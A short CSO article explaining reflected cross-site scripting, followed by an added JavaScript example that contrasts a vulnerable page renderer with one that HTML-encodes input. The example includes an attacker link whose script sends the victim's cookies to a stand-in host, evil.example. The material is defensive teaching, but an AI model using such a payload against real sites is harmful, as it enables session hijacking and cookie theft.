


by CSO Contributor

Cross-site Scripting

Apr 02, 2004
CSO and CISO | Data and Information Security

Like SQL injection and buffer overflow attacks, cross-site scripting (XSS) aims to make a computer execute code it shouldn't. In cross-site scripting the computer is the victim's Web browser: the attacker hides malicious code (a script) in an HTML link on an innocuous-looking Web page (or in an email), and a vulnerable Web site relays that script back to anyone who follows the link.

Example: Let's say I find a URL which purports to link to a Web site I normally trust. Unbeknownst to me, the link carries an embedded script in one of its parameters. When I click on the link, my browser goes to that Web site's host and requests the page for that URL. If the host is vulnerable to cross-site scripting, it dynamically generates a Web page in response to the request and copies the parameter into that page without encoding it, so the page it sends back contains the embedded script. Because the page came from a host my browser trusts, the browser executes the script with that site's privileges: it can read my cookies and session for that site and act on my behalf. The defect is on the server, which fails to HTML-encode user-supplied input before writing it into the page it generates.
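The following is an added example, not code from the original CSO article, that models the reflected cross-site scripting scenario described above in JavaScript. A hypothetical search page at trusted.example echoes its "q" query parameter into the HTML it returns; the attacker's link, the evil.example collection URL and the page template are all constructed for illustration. The vulnerable renderer inserts the raw parameter, while the hardened renderer HTML-encodes it first, so the same link yields inert text instead of an executing script.

```javascript
// Added example (not from the CSO article): a minimal model of reflected
// cross-site scripting. A search page echoes the "q" query parameter back
// into the HTML it generates. The vulnerable version inserts the raw
// value; the hardened version HTML-encodes it first, so the browser
// renders the attacker's payload as text instead of executing it.
// All URLs and the page template below are constructed for illustration.

// A link that looks like a normal search on a trusted site but carries
// a script that ships the victim's cookies to an attacker-controlled host.
const ATTACKER_LINK =
  'https://trusted.example/search?q=<script>document.location="https://evil.example/?c="%2Bdocument.cookie</script>';

// Pull the reflected parameter out of the URL exactly as the server would
// (percent-decoding applied, so %2B becomes "+").
function reflectedParam(url) {
  return new URL(url).searchParams.get('q') ?? '';
}

// Vulnerable: the user-controlled value is concatenated straight into markup.
function renderSearchPageVulnerable(url) {
  const q = reflectedParam(url);
  return `<html><body><h1>Results for: ${q}</h1></body></html>`;
}

// Encode the five characters that can change HTML structure in a text node
// or a quoted attribute value.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened: same template, but the value is escaped for an HTML text context.
function renderSearchPageSafe(url) {
  const q = escapeHtml(reflectedParam(url));
  return `<html><body><h1>Results for: ${q}</h1></body></html>`;
}

// Check whether a generated page contains a live script tag, i.e. whether
// the reflected payload survived as markup rather than as text.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Stand-alone demo: print both renderings of the same attacker link.
if (typeof require !== 'undefined' && require.main === module) {
  console.log('vulnerable:', renderSearchPageVulnerable(ATTACKER_LINK));
  console.log('hardened:  ', renderSearchPageSafe(ATTACKER_LINK));
}
```

Running the block prints two pages built from the same link: the first contains a real `<script>` element that a browser would execute in the trusted site's origin, the second contains `&lt;script&gt;…` which the browser displays as literal text. Encoding must match the output context; the text-node escaping shown here is not sufficient on its own for values written into JavaScript, URLs or unquoted attributes.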